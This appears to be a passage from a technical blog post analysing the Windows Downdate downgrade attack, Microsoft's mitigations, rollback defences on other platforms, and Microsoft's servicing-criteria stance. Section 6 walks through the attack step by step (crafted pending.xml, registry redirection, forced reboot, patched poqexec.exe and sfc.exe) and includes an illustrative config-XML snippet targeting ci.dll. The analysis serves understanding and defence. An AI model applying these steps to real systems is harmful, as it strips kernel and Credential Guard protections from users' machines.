&lt;p&gt;Once you can choose which action list &lt;code&gt;poqexec.exe&lt;/code&gt; parses, and &lt;code&gt;poqexec.exe&lt;/code&gt; was never built to ask &quot;is this list the one I made?&quot;, the consequences write themselves. The crafted &lt;code&gt;pending.xml&lt;/code&gt; can issue any verb the executor supports. It can hardlink an older &lt;code&gt;ci.dll&lt;/code&gt; over the current one. It can hardlink an older &lt;code&gt;ntoskrnl.exe&lt;/code&gt; over the current one. It can hardlink an older &lt;code&gt;securekernel.exe&lt;/code&gt; over the current one. The hashes of those older files appear in the Microsoft-signed catalogs of their original packages, which are still on disk in WinSxS. Every signature the kernel loader and the Secure Kernel will ever check resolves to a Microsoft key.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The bug is structural: the integrity boundary moves between phases of the update. The catalog signature verifies one phase; the directory ACL verifies the next; the registry pointer crosses the boundary in the wrong direction. The fix has to declare a new boundary that does not move.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;6. The Downdate Attack End-to-End&lt;/h2&gt;
&lt;p&gt;What does &lt;code&gt;python windows_downdate.py --config-xml downgrade.xml&lt;/code&gt; actually do on the wire? The tool&apos;s GitHub repository, &lt;code&gt;SafeBreach-Labs/WindowsDowndate&lt;/code&gt;, ships a documented schema and eight example chains, from a generic &lt;code&gt;ItsNotASecurityBoundary-Patch-Downgrade&lt;/code&gt; to a fully-formed &lt;code&gt;VBS-UEFI-Locks-Bypass&lt;/code&gt; [@windowsdowndate-repo]. Read alongside Leviev&apos;s blog, the procedure is, in machine terms, embarrassingly small. Eight steps.&lt;/p&gt;
&lt;h3&gt;6.1 The attack sequence&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Parse the config XML.&lt;/strong&gt; Each &lt;code&gt;&amp;lt;UpdateFile source=&quot;...&quot; destination=&quot;...&quot;/&amp;gt;&lt;/code&gt; element names one file to downgrade. If the source file does not exist locally, the tool retrieves the base version from the WinSxS component store [@windowsdowndate-repo].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Build a crafted pending.xml.&lt;/strong&gt; For each target, emit a &lt;code&gt;&amp;lt;HardlinkFile&amp;gt;&lt;/code&gt; verb that creates a hardlink from the older file&apos;s location to the current file&apos;s location, plus the other POQ verbs needed to set ACLs, register the new file with the component store, and update the on-disk manifest hash where needed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deposit pending.xml in an attacker-writable directory.&lt;/strong&gt; The Administrator does not need TrustedInstaller-write privilege to do this; the tool stores the crafted action list outside the TrustedInstaller-only directories.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Compute a matching PendingXmlIdentifier nonce.&lt;/strong&gt; This is the value that &lt;code&gt;poqexec.exe&lt;/code&gt; cross-checks against the action list at parse time.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Write the two registry values.&lt;/strong&gt; &lt;code&gt;PoqexecCmdline&lt;/code&gt; is set to point at the attacker&apos;s &lt;code&gt;pending.xml&lt;/code&gt;. &lt;code&gt;PendingXmlIdentifier&lt;/code&gt; is set to the nonce computed in step 4.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Trigger a reboot.&lt;/strong&gt; This can be a graceful &lt;code&gt;shutdown /r /t 0&lt;/code&gt; or any reboot-causing event.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;At next boot, &lt;code&gt;poqexec.exe&lt;/code&gt; reads PoqexecCmdline and parses the attacker pending.xml.&lt;/strong&gt; It applies the verbs in order. The current &lt;code&gt;ci.dll&lt;/code&gt; is replaced (via hardlink) with &lt;code&gt;10.0.22621.1376&lt;/code&gt;. The current &lt;code&gt;ntoskrnl.exe&lt;/code&gt; is replaced with whichever version the operator chose. The current &lt;code&gt;securekernel.exe&lt;/code&gt; is replaced. The current &lt;code&gt;hvix64.exe&lt;/code&gt; is replaced. The current &lt;code&gt;LsaIso.exe&lt;/code&gt; is replaced.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Persistence and irreversibility.&lt;/strong&gt; Two further verbs replace &lt;code&gt;poqexec.exe&lt;/code&gt; with a patched copy that NOPs future updates, and replace &lt;code&gt;sfc.exe&lt;/code&gt; with a patched copy that does not flag the downgraded files. Leviev&apos;s claim in the SafeBreach blog is that &lt;code&gt;poqexec.exe&lt;/code&gt; and &lt;code&gt;sfc.exe&lt;/code&gt; are &lt;em&gt;not&lt;/em&gt; Authenticode-signed in the affected builds, so substituting modified versions does not require a code-signing bypass [@safebreach-2024-aug].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The full set of POQ XML verbs that &lt;code&gt;poqexec.exe&lt;/code&gt; understands, taken from Leviev&apos;s documentation: &lt;code&gt;HardlinkFile&lt;/code&gt;, &lt;code&gt;MoveFile&lt;/code&gt;, &lt;code&gt;CreateFile&lt;/code&gt;, &lt;code&gt;SetFileInformation&lt;/code&gt;, &lt;code&gt;DeleteFile&lt;/code&gt;, &lt;code&gt;CreateDirectory&lt;/code&gt;, &lt;code&gt;CreateKey&lt;/code&gt;, &lt;code&gt;SetKeyValue&lt;/code&gt;, &lt;code&gt;SetKeySecurity&lt;/code&gt;, &lt;code&gt;DeleteKeyValue&lt;/code&gt;, and &lt;code&gt;DeleteKey&lt;/code&gt;. The verb that does most of the work in a Downdate is &lt;code&gt;HardlinkFile&lt;/code&gt;, because it lets the attacker replace a file in &lt;code&gt;System32&lt;/code&gt; without ever calling &lt;code&gt;WriteFile&lt;/code&gt; against a TrustedInstaller-owned path.&lt;/p&gt;

flowchart TD
    A[&quot;Operator config XML&lt;br /&gt;UpdateFile source dest pairs&quot;] --&amp;gt; B[&quot;Fetch source files&lt;br /&gt;from WinSxS or attacker storage&quot;]
    B --&amp;gt; C[&quot;Emit crafted pending.xml&lt;br /&gt;HardlinkFile + ACL verbs&quot;]
    C --&amp;gt; D[&quot;Write pending.xml&lt;br /&gt;to attacker dir&quot;]
    D --&amp;gt; E[&quot;Compute PendingXmlIdentifier nonce&quot;]
    E --&amp;gt; F[&quot;Write PoqexecCmdline registry value&lt;br /&gt;point at crafted pending.xml&quot;]
    F --&amp;gt; G[&quot;Write PendingXmlIdentifier&quot;]
    G --&amp;gt; H[&quot;Reboot&quot;]
    H --&amp;gt; I[&quot;poqexec.exe reads PoqexecCmdline&quot;]
    I --&amp;gt; J[&quot;Apply HardlinkFile verbs:&lt;br /&gt;ci.dll, ntoskrnl.exe, securekernel.exe,&lt;br /&gt;hvix64.exe, LsaIso.exe replaced&quot;]
    J --&amp;gt; K[&quot;Optional: patch poqexec.exe NOP&lt;br /&gt;and sfc.exe to NOP&quot;]
    K --&amp;gt; L[&quot;System boots: every signature valid,&lt;br /&gt;every component historic&quot;]
&lt;h3&gt;6.2 What got downgraded&lt;/h3&gt;
&lt;p&gt;Each Downdate target is a different layer of the threat model.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;Afd.sys&lt;/code&gt;&lt;/strong&gt; is the Ancillary Function Driver -- a kernel-mode networking driver. In the Black Hat USA demo, Leviev paired the Downdate of &lt;code&gt;Afd.sys&lt;/code&gt; with CVE-2023-21768 to demonstrate Administrator-to-kernel code execution on a fully patched Windows 11 system [@windowsdowndate-repo].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;ntoskrnl.exe&lt;/code&gt;&lt;/strong&gt; is the NT kernel image itself. Downgrade to a build with a public elevation-of-privilege chain and the resulting kernel is still Microsoft-signed but is also still vulnerable.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;securekernel.exe&lt;/code&gt;&lt;/strong&gt; is the VTL1 &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Secure Kernel&lt;/a&gt;. It is the keystone of VBS: the Secure Kernel is what HVCI and Credential Guard rely on for isolation. Replace it with an older build that contains a kernel-side bug, and every protection that runs in VTL1 is now running on top of compromised infrastructure.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;hvix64.exe&lt;/code&gt;&lt;/strong&gt; and &lt;strong&gt;&lt;code&gt;hvax64.exe&lt;/code&gt;&lt;/strong&gt; are the Intel and AMD Hyper-V hypervisor binaries. Downgrade the hypervisor and the entire VBS trust root has moved beneath you.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;LsaIso.exe&lt;/code&gt;&lt;/strong&gt; is the Credential Guard Isolated User Mode trustlet [@msdocs-credguard]. It holds the LSA secrets that Credential Guard protects. An older &lt;code&gt;LsaIso.exe&lt;/code&gt; is, by Microsoft&apos;s own threat model, a known-bad binary running inside the security-feature-of-record.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;ci.dll&lt;/code&gt;&lt;/strong&gt; is the keystone of the October 2024 follow-up. The kernel-mode Code Integrity module enforces DSE: it is the gate that asks &quot;is this driver signed?&quot; Roll it back to &lt;code&gt;10.0.22621.1376&lt;/code&gt; and Gabriel Landau&apos;s False File Immutability bypass works again on a fully-patched Windows 11.&lt;/p&gt;
&lt;h3&gt;6.3 Bypassing VBS UEFI locks without physical access&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s &quot;VBS UEFI lock&quot; feature, intended to be the strongest configuration of VBS, copies the VBS configuration registry settings into a UEFI non-volatile, boot-services-only variable called &lt;code&gt;VbsPolicy&lt;/code&gt; [@msdocs-vbs-hvci]. Once set, the lock survives reboots, reinstalls, and most ordinary attacks against the registry, because the firmware re-applies it on every boot. Before Windows Downdate, the canonical advice for the highest-security configuration was: turn on VBS with the UEFI lock. The lock was the moat.&lt;/p&gt;
&lt;p&gt;Leviev&apos;s framing of what he showed was direct: &lt;em&gt;&quot;to my knowledge, this is the first time VBS&apos;s UEFI locks have been bypassed without physical access&quot;&lt;/em&gt; [@safebreach-2024-aug].&lt;/p&gt;

To my knowledge, this is the first time VBS&apos;s UEFI locks have been bypassed without physical access. -- Alon Leviev, SafeBreach Labs, August 2024 [@safebreach-2024-aug]
&lt;p&gt;The mechanism is the cleanest possible illustration of the architectural error. The UEFI lock pins &lt;em&gt;configuration&lt;/em&gt; (&lt;code&gt;VbsPolicy&lt;/code&gt;). It does not pin &lt;em&gt;implementation&lt;/em&gt; (&lt;code&gt;securekernel.exe&lt;/code&gt;, &lt;code&gt;hvix64.exe&lt;/code&gt;, &lt;code&gt;LsaIso.exe&lt;/code&gt;, &lt;code&gt;ci.dll&lt;/code&gt;). Downgrade the implementation and the configuration is still happy. From Windows&apos;s point of view, VBS is on, the lock is engaged, the configuration variable is in firmware, everything checks out. The components doing the actual work are simply not the ones the configuration was checked against. Nobody asked it to check.&lt;/p&gt;
&lt;h3&gt;6.4 ItsNotASecurityBoundary, revived&lt;/h3&gt;
&lt;p&gt;On May 14, 2024, Microsoft shipped KB5037771 for Windows 11 22H2 and 23H2 [@landau-itsnotasecurityboundary-repo]. The preview build had landed on April 23, 2024 as KB5036980. The fix closed a False File Immutability TOCTOU on &lt;code&gt;ci.dll&lt;/code&gt; that Gabriel Landau of Elastic Security Labs had disclosed in February [@elastic-ffi]. Landau&apos;s exploit, which he titled &lt;em&gt;ItsNotASecurityBoundary&lt;/em&gt;, used the FFI race to swap an Authenticode catalog mid-verification, getting an unsigned driver loaded with Microsoft&apos;s blessing.&lt;/p&gt;

A bug class identified by Gabriel Landau (Elastic Security Labs) in 2024. Windows treats files mapped as `SEC_IMAGE` as immutable while a view exists, but the kernel does not always honor that immutability across separate reads of the same file. A verifier that reads the file, then re-reads it after a working-set flush, can be served different bytes the second time. On Authenticode catalogs, this becomes a TOCTOU race that lets the attacker swap the catalog between the verifier&apos;s read and the loader&apos;s load.
&lt;p&gt;The October 26, 2024 SafeBreach follow-up [@safebreach-2024-oct], titled &lt;em&gt;An Update on Windows Downdate&lt;/em&gt;, combined the two. It used Windows Downdate to roll &lt;code&gt;ci.dll&lt;/code&gt; back to the pre-May build (&lt;code&gt;10.0.22621.1376&lt;/code&gt;) and re-enabled the FFI bypass on a fully patched Windows 11 23H2 machine [@thehackernews-downdate]. &lt;em&gt;The Hacker News&lt;/em&gt; confirmed the chain: &lt;em&gt;&quot;The DSE bypass is achieved by making use of the downgrade tool to replace the &apos;ci.dll&apos; library with an older version (10.0.22621.1376) to undo the patch put in place by Microsoft&quot;&lt;/em&gt; [@thehackernews-downdate]. The name of Landau&apos;s exploit became, in retrospect, the most pointed commentary on Microsoft&apos;s servicing policy that anyone has written.&lt;/p&gt;

ItsNotASecurityBoundary&apos;s name is an homage to MSRC&apos;s policy that &apos;Administrator-to-kernel is not a security boundary.&apos; -- Gabriel Landau, Elastic Security Labs [@landau-itsnotasecurityboundary-repo]
&lt;h3&gt;6.5 What Microsoft shipped, and when&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s response unfolded over roughly eleven months. Here is the cadence, anchored to the canonical KB and CVE pages.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Aug 7, 2024&lt;/td&gt;
&lt;td&gt;CVE-2024-21302 and CVE-2024-38202 published; Black Hat USA 2024 talk&lt;/td&gt;
&lt;td&gt;[@nvd-cve-2024-21302; @nvd-cve-2024-38202; @safebreach-2024-aug]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aug 11, 2024&lt;/td&gt;
&lt;td&gt;DEF CON 32 talk&lt;/td&gt;
&lt;td&gt;[@safebreach-2024-aug]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aug 13, 2024&lt;/td&gt;
&lt;td&gt;KB5042562: opt-in &lt;code&gt;SkuSiPolicy.p7b&lt;/code&gt; revocation policy with optional UEFI lock, plus default-enabled boot-session CI policy on Win10 1507+&lt;/td&gt;
&lt;td&gt;[@kb5042562]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Oct 8, 2024&lt;/td&gt;
&lt;td&gt;KB5044284: substantive code fix for CVE-2024-38202 in Windows 11 24H2 (OS Build 26100.2033); per-SKU equivalents on the same date&lt;/td&gt;
&lt;td&gt;[@kb5044284; @nvd-cve-2024-38202]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Oct 26, 2024&lt;/td&gt;
&lt;td&gt;SafeBreach follow-up &quot;An Update on Windows Downdate&quot; -- ItsNotASecurityBoundary revival via &lt;code&gt;ci.dll&lt;/code&gt; downgrade&lt;/td&gt;
&lt;td&gt;[@safebreach-2024-oct; @thehackernews-downdate]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Jul 8-10, 2025&lt;/td&gt;
&lt;td&gt;CVE-2024-21302 mitigations completed across Windows 10 1507, 1607, 1809, Windows Server 2016, and Windows Server 2018&lt;/td&gt;
&lt;td&gt;[@nvd-cve-2024-21302]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;KB5042562 is the more interesting of the two artifacts. It introduces two mechanisms.&lt;/p&gt;
&lt;p&gt;The first is an &lt;em&gt;opt-in&lt;/em&gt; &lt;code&gt;SkuSiPolicy.p7b&lt;/code&gt; policy: an administrator copies the Microsoft-signed &lt;code&gt;.p7b&lt;/code&gt; file from &lt;code&gt;%windir%\System32\SecureBootUpdates\&lt;/code&gt; to the EFI System Partition&apos;s &lt;code&gt;\EFI\Microsoft\Boot\&lt;/code&gt; directory; on boot, Windows reads the policy and refuses to load any binary whose version is listed as revoked [@kb5042562].&lt;/p&gt;
&lt;p&gt;The second is a &lt;em&gt;default-enabled&lt;/em&gt; boot-session CI policy that ships to every Windows 10 1507+ device and, per the KB, &lt;em&gt;&quot;will be loaded during boot and the enforcement of this policy will prevent rollback of VBS system files during that boot session&quot;&lt;/em&gt; [@kb5042562]. On Windows 11 24H2 and Server 2022/23H2, DRTM (Dynamic Root of Trust for Measurement) binds the VBS-protected encryption keys to the policy version, so a downgraded boot does not unseal the keys.&lt;/p&gt;

A Microsoft-signed Code Integrity policy file shipped in KB5042562 that lists revoked versions of VBS system files (`securekernel.exe`, `hvix64.exe`/`hvax64.exe`, `LsaIso.exe`, `ci.dll`, and others). When deployed to the EFI System Partition with the optional UEFI lock, it survives reformats and binds version-revocation enforcement to a Microsoft signature in firmware-stored state.

A trusted-launch mechanism, available on Windows 11 24H2 and Server 2022/23H2, that uses CPU SMI / SKINIT instructions to establish a measured execution environment after the OS has begun booting. In KB5042562&apos;s context, DRTM binds Virtual Secure Mode&apos;s protected encryption keys to the version of the active CI policy, so a rolled-back boot session cannot unseal the keys.
&lt;p&gt;{`
// Simulate the construction of the WindowsDowndate config XML for a ci.dll downgrade.
// This shows the structure the tool consumes, not the action list it emits.
// Nothing here writes to a real system or runs a real attack.&lt;/p&gt;
&lt;p&gt;const configEntries = [
  {
    source: &quot;C:\\Windows\\WinSxS\\amd64_microsoft-windows-codeintegrity_31bf3856ad364e35_10.0.22621.1376_none\\ci.dll&quot;,
    destination: &quot;C:\\Windows\\System32\\ci.dll&quot;,
    component: &quot;Code Integrity (kernel DSE enforcement)&quot;,
    targetVersion: &quot;10.0.22621.1376&quot;,
    rationale: &quot;Pre-May-2024 build, before the FFI/ItsNotASecurityBoundary fix&quot;
  }
];&lt;/p&gt;
&lt;p&gt;function buildConfigXml(entries) {
  const lines = [&apos;&apos;, &apos;&apos;];
  for (const e of entries) {
    lines.push(
      &apos;  &amp;lt;UpdateFile source=&quot;&apos; + e.source + &apos;&quot;&apos;,
      &apos;              destination=&quot;&apos; + e.destination + &apos;&quot; /&amp;gt;&apos;
    );
  }
  lines.push(&apos;&apos;);
  return lines.join(&apos;\n&apos;);
}&lt;/p&gt;
&lt;p&gt;const xml = buildConfigXml(configEntries);
console.log(xml);&lt;/p&gt;
&lt;p&gt;// What the tool would emit into the crafted pending.xml on next boot:
console.log(&apos;\nResulting POQ verb (illustrative):&apos;);
console.log(&apos;  &amp;lt;HardlinkFile source=&quot;&apos; + configEntries[0].source + &apos;&quot;&apos;);
console.log(&apos;                destination=&quot;&apos; + configEntries[0].destination + &apos;&quot; /&amp;gt;&apos;);
`}&lt;/p&gt;
&lt;p&gt;The mitigation does not patch the primitive. It patches &lt;em&gt;the components Leviev demonstrated against&lt;/em&gt;, one at a time, with a Microsoft-signed list of historical hashes. That choice is deliberate, and the next two sections are about why.&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches -- How Other Platforms Closed the Gap&lt;/h2&gt;
&lt;p&gt;Android made the opposite design decision in 2017. Apple did so in 2020. The TLS working group did so in 2018. The IETF SUIT working group did so in 2021. By the time Leviev presented at Black Hat USA 2024, every major adjacent platform had treated rollback as a primary threat and shipped a structural fix. Windows was the outlier.&lt;/p&gt;
&lt;h3&gt;Android Verified Boot 2.0: per-partition rollback indices&lt;/h3&gt;
&lt;p&gt;AVB stamps a 64-bit &lt;code&gt;rollback_index&lt;/code&gt; into the signed footer of each partition. On each successful boot of a partition image, the bootloader updates a per-slot stored maximum in TrustZone or in eMMC Replay Protected Memory Block storage. On the next boot, the bootloader refuses any image whose &lt;code&gt;rollback_index&lt;/code&gt; is below the stored maximum [@aosp-avb; @avb-readme].&lt;/p&gt;
&lt;p&gt;The check happens in firmware, before the kernel loads. There is no opt-in. There is no enterprise toggle. There is no operational risk warning about the lock being irreversible. The rollback index is a &lt;em&gt;structural&lt;/em&gt; part of the trust architecture, not a policy file that ships through the same update channel that an attacker would compromise.&lt;/p&gt;
&lt;h3&gt;Apple Sealed System Volume: a Merkle seal over the OS&lt;/h3&gt;
&lt;p&gt;Apple&apos;s Signed System Volume (Big Sur, November 2020) takes the Android approach and pushes it further. SSV computes a SHA-256 hash of every file in the system volume, builds a Merkle tree over those hashes, and signs the root with an Apple key [@apple-ssv].&lt;/p&gt;
&lt;p&gt;The Apple Platform Security guide describes it precisely: &lt;em&gt;&quot;SSV features a kernel mechanism that verifies the integrity of the system content at runtime and rejects any data -- code and noncode -- without a valid cryptographic signature from Apple&quot;&lt;/em&gt; and &lt;em&gt;&quot;Each SSV SHA-256 hash is stored in the main file-system metadata tree, which is itself hashed. Because each node of the tree recursively verifies the integrity of the hashes of its children -- similar to a binary hash (Merkle) tree -- the root node&apos;s hash value, called a seal, encompasses every byte of data in the SSV&quot;&lt;/em&gt; [@apple-ssv]. On iOS and iPadOS, &lt;em&gt;&quot;Users aren&apos;t allowed to turn off the protection of a signed system volume&quot;&lt;/em&gt; [@apple-ssv]. The check is structural and mandatory.&lt;/p&gt;
&lt;h3&gt;IETF SUIT: rollback in the IoT firmware threat model&lt;/h3&gt;
&lt;p&gt;RFC 9019 standardised the firmware-update threat model the IoT industry now treats as canonical. The document does not mince words: &lt;em&gt;&quot;The firmware image is authenticated and integrity protected. Attempts to flash a maliciously modified firmware image or an image from an unknown, untrusted source must be prevented&quot;&lt;/em&gt; [@rfc9019]. The Update Framework&apos;s CCS 2010 paper and its present-day specification share the same vocabulary: &lt;em&gt;&quot;Rollback attacks. An attacker presents files to a software update system that are older than those the client has already seen. With no way to tell it is an obsolete version that may contain vulnerabilities, the user installs the software&quot;&lt;/em&gt; [@tuf-security]. TUF, now a CNCF graduated project, is the academic-canonical reference [@tuf-spec].&lt;/p&gt;
&lt;h3&gt;TLS 1.3: rollback baked into the protocol&lt;/h3&gt;
&lt;p&gt;The protocol world&apos;s answer is in RFC 8446 section 4.1.3 [@rfc8446]. A TLS 1.3 server that detects a downgrade attempt -- a client that supports TLS 1.3 but is being routed through a man-in-the-middle that strips it back to TLS 1.2 -- writes a specific magic constant into the last 8 bytes of &lt;code&gt;ServerHello.random&lt;/code&gt;. A genuine TLS 1.3 client, completing the handshake, checks those bytes and aborts the connection if the magic is present. The integrity check is bound into the transcript hash, so a network attacker cannot rewrite it without breaking the handshake. The mitigation is part of the protocol, not a guideline operators can apply.&lt;/p&gt;

flowchart LR
    A[&quot;Android AVB 2.0&quot;] --&amp;gt; A1[&quot;TrustZone / RPMB&lt;br /&gt;per-slot rollback_index&quot;]
    B[&quot;Apple SSV&quot;] --&amp;gt; B1[&quot;Secure Enclave / T2&lt;br /&gt;signed Merkle root&quot;]
    C[&quot;IETF SUIT (RFC 9019)&quot;] --&amp;gt; C1[&quot;Spec-defined&lt;br /&gt;device-side state&quot;]
    D[&quot;TLS 1.3 (RFC 8446)&quot;] --&amp;gt; D1[&quot;In-protocol&lt;br /&gt;ServerHello.random bytes&quot;]
    E[&quot;TUF&quot;] --&amp;gt; E1[&quot;Snapshot + timestamp roles&lt;br /&gt;monotonic version numbers&quot;]
    F[&quot;Windows SkuSiPolicy.p7b&quot;] --&amp;gt; F1[&quot;EFI System Partition&lt;br /&gt;opt-in UEFI lock&quot;]
    F --&amp;gt; F2[&quot;Boot session only&lt;br /&gt;default-enabled CI policy&quot;]
&lt;p&gt;The differences between these designs are not cosmetic. They are decisions about &lt;em&gt;where the rollback state lives&lt;/em&gt; and &lt;em&gt;who is authorised to write it&lt;/em&gt;. Read the table below row by row and the contrast is uncomfortable.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Windows &lt;code&gt;SkuSiPolicy.p7b&lt;/code&gt;&lt;/th&gt;
&lt;th&gt;Android AVB 2.0&lt;/th&gt;
&lt;th&gt;Apple SSV&lt;/th&gt;
&lt;th&gt;IETF SUIT&lt;/th&gt;
&lt;th&gt;TUF&lt;/th&gt;
&lt;th&gt;TLS 1.3&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Initiation&lt;/td&gt;
&lt;td&gt;Opt-in (strong) / default-enabled (boot-session)&lt;/td&gt;
&lt;td&gt;Mandatory&lt;/td&gt;
&lt;td&gt;Mandatory&lt;/td&gt;
&lt;td&gt;Adopter-defined&lt;/td&gt;
&lt;td&gt;Adopter-defined&lt;/td&gt;
&lt;td&gt;Mandatory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protected unit&lt;/td&gt;
&lt;td&gt;Per-component hash list&lt;/td&gt;
&lt;td&gt;Per-partition signed image&lt;/td&gt;
&lt;td&gt;Whole system volume&lt;/td&gt;
&lt;td&gt;Per-firmware image&lt;/td&gt;
&lt;td&gt;Per-package metadata&lt;/td&gt;
&lt;td&gt;Per-handshake nonce&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Version-state storage&lt;/td&gt;
&lt;td&gt;EFI System Partition + optional UEFI lock&lt;/td&gt;
&lt;td&gt;TEE / RPMB rollback index&lt;/td&gt;
&lt;td&gt;Secure Enclave / signed root&lt;/td&gt;
&lt;td&gt;Device-side spec&lt;/td&gt;
&lt;td&gt;Snapshot + timestamp roles&lt;/td&gt;
&lt;td&gt;In-protocol&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hardware-root binding&lt;/td&gt;
&lt;td&gt;Optional via UEFI lock; DRTM on Win11 24H2+&lt;/td&gt;
&lt;td&gt;TrustZone / RPMB&lt;/td&gt;
&lt;td&gt;Apple silicon / T2&lt;/td&gt;
&lt;td&gt;Spec abstract&lt;/td&gt;
&lt;td&gt;Spec abstract&lt;/td&gt;
&lt;td&gt;None required&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Coverage gaps&lt;/td&gt;
&lt;td&gt;First-party components not in the policy still load&lt;/td&gt;
&lt;td&gt;Slots not covered by AVB&lt;/td&gt;
&lt;td&gt;None on iOS/iPadOS; SSV must remain on macOS&lt;/td&gt;
&lt;td&gt;Adopter-defined&lt;/td&gt;
&lt;td&gt;Out-of-spec metadata roles&lt;/td&gt;
&lt;td&gt;None within scope&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every other major platform&apos;s modern update architecture treats rollback as a primary threat baked into the trust architecture. Windows treats it as a privilege-boundary question -- and the answer it picked, &quot;Administrator-to-kernel is not a security boundary,&quot; excludes the most common attacker.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If Apple, Google, and the IETF have all figured out the answer, why hasn&apos;t Microsoft?&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits -- &quot;Admin-to-Kernel Is Not a Boundary&quot;&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s answer is that they have no need to.&lt;/p&gt;
&lt;h3&gt;8.1 The Microsoft position&lt;/h3&gt;
&lt;p&gt;The Windows Security Servicing Criteria is the public document where Microsoft enumerates which Windows interfaces it treats as security boundaries [@msft-servicing-criteria]. The document defines the concept: a security boundary provides a logical separation between the code and data of security domains with different levels of trust, with kernel-mode versus user-mode as the canonical example.&lt;/p&gt;
&lt;p&gt;It then asks the servicing test: &lt;em&gt;&quot;Does the vulnerability violate the goal or intent of a security boundary or a security feature?&quot;&lt;/em&gt; [@msft-servicing-criteria]. If the answer is yes, Microsoft commits to ship a security update. If the answer is no, the issue can still be fixed -- in a quality update, in a refactor, in a future feature -- but it does not get a CVE and the standardised servicing cadence does not apply.&lt;/p&gt;
&lt;p&gt;The boundaries Microsoft enumerates in that document include network boundaries (machine-to-machine), kernel-mode-to-user-mode separation, hypervisor-to-VM separation, and several others. &lt;strong&gt;Administrator-to-kernel is not on the list.&lt;/strong&gt; By the document&apos;s own logic, an Administrator who reaches kernel code execution has not crossed a boundary, because the document does not declare a boundary there for them to cross. That is the policy position Landau&apos;s exploit title was named after.&lt;/p&gt;
&lt;p&gt;The two CVEs that &lt;em&gt;were&lt;/em&gt; assigned are the boundary-crossing parts of the chain.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CVE-2024-21302&lt;/strong&gt; is the Secure Kernel Mode Elevation of Privilege (VTL0-to-VTL1) -- a downgrade-induced compromise of &lt;code&gt;securekernel.exe&lt;/code&gt; does cross a defined boundary, because the kernel-to-Secure-Kernel separation is on the list [@nvd-cve-2024-21302]. &lt;strong&gt;CVE-2024-38202&lt;/strong&gt; is the basic-user-to-Administrator elevation via the restore-point flow -- a basic user induced into authorising a system restore can be parked into a state that triggers a downgrade, which crosses the user-to-admin boundary [@nvd-cve-2024-38202]. Both CVEs were assigned and patched from August 7, 2024 onward; CVE-2024-38202 received its substantive code fix on October 8, 2024 [@kb5044284; @nvd-cve-2024-38202].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft assigned CVE-2024-21302 (Secure Kernel EoP) and CVE-2024-38202 (basic-user-induced restore-point EoP) on August 7, 2024 and patched both. What Microsoft has &lt;em&gt;not&lt;/em&gt; committed to fix as a security vulnerability is the underlying Downdate primitive itself -- the Administrator-context modification of &lt;code&gt;PoqexecCmdline&lt;/code&gt;. Per the Servicing Criteria, that primitive does not cross a declared boundary [@safebreach-2024-oct; @msft-servicing-criteria].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Leviev quoted Microsoft&apos;s framing of this distinction in his October 2024 follow-up:&lt;/p&gt;

CVE-2024-21302 was patched because it crossed a defined security boundary, the Windows Update takeover which was reported to Microsoft as well, has remained unpatched, as it did not cross a defined security boundary. Gaining kernel code execution as an Administrator is not considered as crossing a security boundary (not a vulnerability). -- Alon Leviev, summarising the Microsoft position, October 2024 [@safebreach-2024-oct]
